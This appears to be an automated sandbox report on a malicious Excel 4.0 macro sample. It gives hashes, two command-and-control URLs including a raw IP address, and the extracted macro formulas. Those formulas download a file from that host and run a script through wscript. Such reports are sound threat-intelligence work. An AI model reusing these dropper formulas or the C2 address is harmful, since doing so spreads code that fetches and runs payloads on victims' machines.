General

  • Target

    12f2e24bc4d9ff73c0f29d9bd7d8c0d9

  • Size

    6KB

  • Sample

    231221-2b2vgadahr

  • MD5

    12f2e24bc4d9ff73c0f29d9bd7d8c0d9

  • SHA1

    ae55ca49e2a8e059f6ebba8f5a7c77383218d3f0

  • SHA256

    a22fc0b0fb5c5382f7c47c8af9824353b6e5ad6c99bf71f01dc3e05223cc8ac7

  • SHA512

    64668bf8bdda36a73fd5ddea951ac98da1bf01f0382a3401921207529c1d5298f34c01fbc73b34c60404775233a071d24fbaa2a6a8d0e3d3971358bcb40ff05b

  • SSDEEP

    192:NDShuSbbrA2OmmfRG8UhHFBFYuAb98yNqxxL+w:NauEM2w01FYxb98y4xH

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      12f2e24bc4d9ff73c0f29d9bd7d8c0d9

    • Size

      6KB

    • MD5

      12f2e24bc4d9ff73c0f29d9bd7d8c0d9

    • SHA1

      ae55ca49e2a8e059f6ebba8f5a7c77383218d3f0

    • SHA256

      a22fc0b0fb5c5382f7c47c8af9824353b6e5ad6c99bf71f01dc3e05223cc8ac7

    • SHA512

      64668bf8bdda36a73fd5ddea951ac98da1bf01f0382a3401921207529c1d5298f34c01fbc73b34c60404775233a071d24fbaa2a6a8d0e3d3971358bcb40ff05b

    • SSDEEP

      192:NDShuSbbrA2OmmfRG8UhHFBFYuAb98yNqxxL+w:NauEM2w01FYxb98y4xH

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks